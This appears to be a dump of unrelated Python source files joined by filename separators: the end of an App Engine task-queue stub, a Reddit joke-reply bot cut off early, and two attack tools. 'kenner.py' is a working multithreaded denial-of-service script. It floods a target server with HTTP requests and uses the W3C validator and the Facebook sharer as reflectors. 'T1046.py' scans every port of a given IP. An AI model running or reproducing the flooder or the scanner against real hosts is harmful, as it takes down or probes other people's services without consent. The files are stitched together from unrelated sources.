self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
      TaskQueueServiceError.TOMBSTONED_TASK: if the task was already deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
task.set_retry_count(max(0, random.randint(-10, 5)))
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers)-1)
key, value = random_headers.pop(elem)
header_proto = task.add_header()
header_proto.set_key(key)
header_proto.set_value(value)
return task
now_usec = _SecToUsec(time.time())
for _ in range(num_tasks):
self._InsertTask(RandomTask())
class _TaskExecutor(object):
"""Executor for a task object.
Converts a TaskQueueQueryTasksResponse_Task into a http request, then uses the
httplib library to send it to the http server.
"""
def __init__(self, default_host):
"""Constructor.
Args:
default_host: a string to use as the host/port to connect to if the host
header is not specified in the task.
"""
self._default_host = default_host
def _HeadersFromTask(self, task, queue):
"""Constructs the http headers for the given task.
This function will remove special headers (values in BUILT_IN_HEADERS) and
add the taskqueue headers.
Args:
task: The task, a TaskQueueQueryTasksResponse_Task instance.
queue: The queue that this task belongs to, an _Queue instance.
Returns:
A tuple of (header_dict, headers), where:
header_dict: A mapping from lowercase header name to a list of values.
        headers: a list of tuples containing the http header and value. There
          may be multiple entries with the same key.
"""
headers = []
header_dict = {}
for header in task.header_list():
header_key_lower = header.key().lower()
if header_key_lower not in BUILT_IN_HEADERS:
headers.append((header.key(), header.value()))
header_dict.setdefault(header_key_lower, []).append(header.value())
headers.append(('X-AppEngine-QueueName', queue.queue_name))
headers.append(('X-AppEngine-TaskName', task.task_name()))
headers.append(('X-AppEngine-TaskRetryCount', str(task.retry_count())))
headers.append(('X-AppEngine-Fake-Is-Admin', '1'))
headers.append(('Content-Length', str(len(task.body()))))
if 'content-type' not in header_dict:
headers.append(('Content-Type', 'application/octet-stream'))
return header_dict, headers
def ExecuteTask(self, task, queue):
"""Construct a http request from the task and dispatch it.
Args:
task: The task to convert to a http request and then send. An instance of
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task
queue: The queue that this task belongs to. An instance of _Queue.
Returns:
      True if the task was dispatched and the server returned a 2xx HTTP
      status, False otherwise.
"""
try:
method = task.RequestMethod_Name(task.method())
header_dict, headers = self._HeadersFromTask(task, queue)
connection_host, = header_dict.get('host', [self._default_host])
if connection_host is None:
logging.error('Could not determine where to send the task "%s" '
'(Url: "%s") in queue "%s". Treating as an error.',
task.task_name(), task.url(), queue.queue_name)
return False
connection = httplib.HTTPConnection(connection_host)
connection.putrequest(
method, task.url(),
skip_host='host' in header_dict,
skip_accept_encoding='accept-encoding' in header_dict)
for header_key, header_value in headers:
connection.putheader(header_key, header_value)
connection.endheaders()
if task.has_body():
connection.send(task.body())
response = connection.getresponse()
response.read()
response.close()
return 200 <= response.status < 300
except (httplib.HTTPException, socket.error):
      logging.exception('An error occurred while sending the task "%s" '
'(Url: "%s") in queue "%s". Treating as a task error.',
task.task_name(), task.url(), queue.queue_name)
return False
class _BackgroundTaskScheduler(object):
"""The task scheduler class.
This class is designed to be run in a background thread.
Note: There must not be more than one instance of _BackgroundTaskScheduler per
group.
"""
def __init__(self, group, task_executor, retry_seconds, **kwargs):
"""Constructor.
Args:
group: The group that we will automatically execute tasks from. Must be an
instance of _Group.
task_executor: The class used to convert a task into a http request. Must
be an instance of _TaskExecutor.
retry_seconds: The number of seconds to delay a task by if its execution
fails.
_get_time: a callable that returns the current time in seconds since the
epoch. This argument may only be passed in by keyword. If unset, use
time.time.
"""
self._group = group
self._should_exit = False
self._next_wakeup = INF
self._event = threading.Event()
self._wakeup_lock = threading.Lock()
self.task_executor = task_executor
self.default_retry_seconds = retry_seconds
self._get_time = kwargs.pop('_get_time', time.time)
if kwargs:
raise TypeError('Unknown parameters: %s' % ', '.join(kwargs))
def UpdateNextEventTime(self, next_event_time):
"""Notify the TaskExecutor of the closest event it needs to process.
Args:
next_event_time: The time of the event in seconds since the epoch.
"""
with self._wakeup_lock:
if next_event_time < self._next_wakeup:
self._next_wakeup = next_event_time
self._event.set()
def Shutdown(self):
"""Request this TaskExecutor to exit."""
self._should_exit = True
self._event.set()
def _ProcessQueues(self):
with self._wakeup_lock:
self._next_wakeup = INF
now = self._get_time()
queue, task = self._group.GetNextPushTask()
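    # Drain every push task whose ETA has passed: successful executions are
    # deleted, failures are postponed according to the retry policy until it
    # gives up, at which point the task is deleted permanently.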
while task and _UsecToSec(task.eta_usec()) <= now:
if task.retry_count() == 0:
task.set_first_try_usec(_SecToUsec(now))
task_result = self.task_executor.ExecuteTask(task, queue)
now = self._get_time()
if task_result:
queue.Delete(task.task_name())
else:
retry = Retry(task, queue)
age_usec = _SecToUsec(now) - task.first_try_usec()
if retry.CanRetry(task.retry_count() + 1, age_usec):
retry_usec = retry.CalculateBackoffUsec(task.retry_count() + 1)
logging.warning(
'Task %s failed to execute. This task will retry in %.3f seconds',
task.task_name(), _UsecToSec(retry_usec))
queue.PostponeTask(task, _SecToUsec(now) + retry_usec)
else:
logging.warning(
'Task %s failed to execute. The task has no remaining retries. '
'Failing permanently after %d retries and %d seconds',
task.task_name(), task.retry_count(), _UsecToSec(age_usec))
queue.Delete(task.task_name())
queue, task = self._group.GetNextPushTask()
if task:
with self._wakeup_lock:
eta = _UsecToSec(task.eta_usec())
if eta < self._next_wakeup:
self._next_wakeup = eta
def _Wait(self):
"""Block until we need to process a task or we need to exit."""
now = self._get_time()
while not self._should_exit and self._next_wakeup > now:
timeout = self._next_wakeup - now
self._event.wait(timeout)
self._event.clear()
now = self._get_time()
def MainLoop(self):
"""The main loop of the scheduler."""
while not self._should_exit:
self._ProcessQueues()
self._Wait()
class TaskQueueServiceStub(apiproxy_stub.APIProxyStub):
"""Python only task queue service stub.
This stub executes tasks when enabled by using the dev_appserver's AddEvent
capability. When task running is disabled this stub will store tasks for
display on a console, where the user may manually execute the tasks.
"""
def __init__(self,
service_name='taskqueue',
root_path=None,
auto_task_running=False,
task_retry_seconds=30,
_all_queues_valid=False,
default_http_server=None,
_testing_validate_state=False):
"""Constructor.
Args:
service_name: Service name expected for all calls.
root_path: Root path to the directory of the application which may contain
a queue.yaml file. If None, then it's assumed no queue.yaml file is
available.
auto_task_running: When True, the dev_appserver should automatically
run tasks after they are enqueued.
task_retry_seconds: How long to wait between task executions after a
task fails.
_testing_validate_state: Should this stub and all of its _Groups (and
        thus all of its _Queues) validate their state after each
operation? This should only be used during testing of the
taskqueue_stub.
"""
super(TaskQueueServiceStub, self).__init__(
service_name, max_request_size=MAX_REQUEST_SIZE)
self._queues = {}
self._all_queues_valid = _all_queues_valid
self._root_path = root_path
self._testing_validate_state = _testing_validate_state
self._queues[None] = _Group(
self._ParseQueueYaml, app_id=None,
_all_queues_valid=_all_queues_valid,
_update_newest_eta=self._UpdateNextEventTime,
_testing_validate_state=self._testing_validate_state)
self._auto_task_running = auto_task_running
self._started = False
self._task_scheduler = _BackgroundTaskScheduler(
self._queues[None], _TaskExecutor(default_http_server),
retry_seconds=task_retry_seconds)
def StartBackgroundExecution(self):
"""Start automatic task execution."""
if not self._started and self._auto_task_running:
task_scheduler_thread = threading.Thread(
target=self._task_scheduler.MainLoop)
task_scheduler_thread.setDaemon(True)
task_scheduler_thread.start()
self._started = True
def Shutdown(self):
"""Requests the task scheduler to shutdown."""
self._task_scheduler.Shutdown()
def _ParseQueueYaml(self):
"""Loads the queue.yaml file and parses it.
Returns:
None if queue.yaml doesn't exist, otherwise a queueinfo.QueueEntry object
populated from the queue.yaml.
"""
if hasattr(self, 'queue_yaml_parser'):
return self.queue_yaml_parser(self._root_path)
if self._root_path is None:
return None
for queueyaml in ('queue.yaml', 'queue.yml'):
try:
fh = open(os.path.join(self._root_path, queueyaml), 'r')
except IOError:
continue
try:
queue_info = queueinfo.LoadSingleQueue(fh)
return queue_info
finally:
fh.close()
return None
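# For illustration only: a minimal queue.yaml that this parser would pick up
# from root_path could look roughly like the sketch below (the queue name and
# rate are example values, not anything this stub requires):
#
#   queue:
#   - name: default
#     rate: 5/s
#     bucket_size: 5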
def _UpdateNextEventTime(self, callback_time):
"""Enqueue a task to be automatically scheduled.
Note: If auto task running is disabled, this function is a no-op.
Args:
callback_time: The earliest time this task may be run, in seconds since
the epoch.
"""
self._task_scheduler.UpdateNextEventTime(callback_time)
def _GetGroup(self, app_id=None):
"""Get the _Group instance for app_id, creating a new one if needed.
Args:
app_id: The app id in question. Note: This field is not validated.
"""
if app_id not in self._queues:
self._queues[app_id] = _Group(
app_id=app_id, _all_queues_valid=self._all_queues_valid,
_testing_validate_state=self._testing_validate_state)
return self._queues[app_id]
def _Dynamic_Add(self, request, response):
"""Add a single task to a queue.
This method is a wrapper around the BulkAdd RPC request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueAddResponse. See
taskqueue_service.proto.
"""
bulk_request = taskqueue_service_pb.TaskQueueBulkAddRequest()
bulk_response = taskqueue_service_pb.TaskQueueBulkAddResponse()
bulk_request.add_add_request().CopyFrom(request)
self._Dynamic_BulkAdd(bulk_request, bulk_response)
assert bulk_response.taskresult_size() == 1
result = bulk_response.taskresult(0).result()
if result != taskqueue_service_pb.TaskQueueServiceError.OK:
raise apiproxy_errors.ApplicationError(result)
elif bulk_response.taskresult(0).has_chosen_task_name():
response.set_chosen_task_name(
bulk_response.taskresult(0).chosen_task_name())
def _Dynamic_BulkAdd(self, request, response):
"""Add many tasks to a queue using a single request.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See
taskqueue_service.proto.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See
taskqueue_service.proto.
"""
assert request.add_request_size(), 'taskqueue should prevent empty requests'
self._GetGroup(_GetAppId(request.add_request(0))).BulkAdd_Rpc(
request, response)
def GetQueues(self):
"""Gets all the application's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12}, ...]
The list of queues always includes the default queue.
"""
return self._GetGroup().GetQueuesAsDicts()
def GetTasks(self, queue_name):
"""Gets a queue's tasks.
Args:
queue_name: Queue's name to return tasks for.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value'),
('X-AppEngine-QueueName', 'update-queue'),
('X-AppEngine-TaskName', 'task-123'),
('X-AppEngine-TaskRetryCount', '0'),
('X-AppEngine-Development-Payload', '1'),
('Content-Length', 0),
('Content-Type', 'application/octet-stream')]}, ...]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
This implementation loads some stats from the task store and fills in the
rest with random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
Deletes tasks from the task store, with a 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces a task in a queue to run. In this stub it is a no-op that
fails randomly, for testing purposes.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
queue_names: A list of queue names to retrieve tasks from. If left blank,
this defaults to all available queues.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
decoded_body = base64.b64decode(task['body'])
if decoded_body:
task['params'] = cgi.parse_qs(decoded_body)
task['eta'] = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=task['headers'],
params=task.get('params'), eta=task['eta'])
tasks.append(task_object)
return tasks
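# Illustrative usage only (a sketch, assuming the google.appengine.ext.testbed
# setup commonly used in unit tests; none of these names are defined here):
#
#   tb = testbed.Testbed()
#   tb.activate()
#   tb.init_taskqueue_stub(root_path='.')
#   stub = tb.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
#   taskqueue.add(url='/update', queue_name='default')
#   tasks = stub.get_filtered_tasks(url='/update', queue_names=['default'])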
|
kenner.py
|
#
#88 a8P
#88 ,88'
#88 ,88"
#88,d88' ,adPPYba, 8b,dPPYba, 8b,dPPYba, ,adPPYba, 8b,dPPYba,
#8888"88, a8P_____88 88P' `"8a 88P' `"8a a8P_____88 88P' "Y8
#88P Y8b 8PP""""""" 88 88 88 88 8PP""""""" 88
#88 "88, "8b, ,aa 88 88 88 88 "8b, ,aa 88
#88 Y8b `"Ybbd8"' 88 88 88 88 `"Ybbd8"' 88
#
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbotlar kennerliyor...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--paketler yollandi! kennerleniyor--> \033[0m")
else:
s.shutdown(1)
print("\033[91mKENNERLENDI\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mBaglanti yok galiba kennerlendi\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m 88 a8P
88 ,88'
88 ,88"
88,d88' ,adPPYba, 8b,dPPYba, 8b,dPPYba, ,adPPYba, 8b,dPPYba,
8888"88, a8P_____88 88P' `"8a 88P' `"8a a8P_____88 88P' "Y8
88P Y8b 8PP""""""" 88 88 88 88 8PP""""""" 88
88 "88, "8b, ,aa 88 88 88 88 "8b, ,aa 88
88 Y8b `"Ybbd8"' 88 88 88 88 `"Ybbd8"' 88 \n
usage : python3 kenner.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mBekleyin...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91msunucu ip adresini kontrol et portunuda\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
T1046.py
|
from socket import *
from threading import Thread
import argparse
def checking_port(host, port_number):
s = socket(AF_INET, SOCK_STREAM)
try:
s.connect((host, int(port_number)))
print(f'{host}/{port} - open')
except:
pass
arguments = argparse.ArgumentParser()
arguments.add_argument('-i', required=True, action='store', dest='ip', help='IP using to scan ports')
values = arguments.parse_args()
print('\nOpen ports:')
for port in range(0, 65536):
t = Thread(target=checking_port, args=(values.ip, port))
t.start()
|
chickenbot.py
|
import praw
import pickle
import re
from prawcore.exceptions import Forbidden, PrawcoreException
from praw.exceptions import ClientException, RedditAPIException
from traceback import format_exc
from collections import deque
from random import shuffle
from time import sleep
from datetime import datetime, timedelta
from os import get_terminal_size
from pathlib import Path
from threading import Thread
from signal import signal, SIGINT
from urllib.parse import quote
class ChickenBot():
def __init__(self,
subreddit = "all",
question = "why did the chicken cross the road",
wait_interval = 3600, # Time in seconds for searching new posts
user_cooldown = 86400, # Time in seconds for when an user can get a new reply from the bot
user_refresh = 1800, # Minimum time in seconds for cleaning the replied users list
message_wait = 900, # Minimum time in seconds for checking new private messages
counter_start = 0, # The starting value of the bot replies counter
):
"""The bot works by searching each 1 hour (default) for the question in the title
of posts, and then checking if the post author did not get a reply from the bot in
the last 24 hours. If those checks have passed, the bot replies with a randonly
selected answer.
The search is made this way, instead of constantly checking for a stream of new
submissions, because the default question do not come that often (2 to 3 times a
day, on average). Thus continuously checking for all new posts would be a waste of
resources (especially bandwidth)."""
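# For illustration (a sketch based on the defaults above, not extra behavior):
# with subreddit="all" and the default question, the periodic lookup done in
# check_submissions() boils down to roughly
#   reddit.subreddit("all").search("(title:why did the chicken cross the road)", sort="new")
# issued once per `wait_interval` seconds.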
# Open Reddit instance
print("Starting up ChickenBot...")
print("Logging in Reddit... ", end="", flush=True)
self.reddit = praw.Reddit()
self.reddit.validate_on_submit = True
self.subreddit = self.reddit.subreddit(subreddit)
print("Finished")
# Question
self.question = question.lower()
self.query = f"(title:{self.question})"
self.previous_post = "" # Last post which had the question on the title
self.previous_reply_time = datetime.utcnow() # Time of the latest bot reply
self.wait = wait_interval # Time to wait between checks for new posts
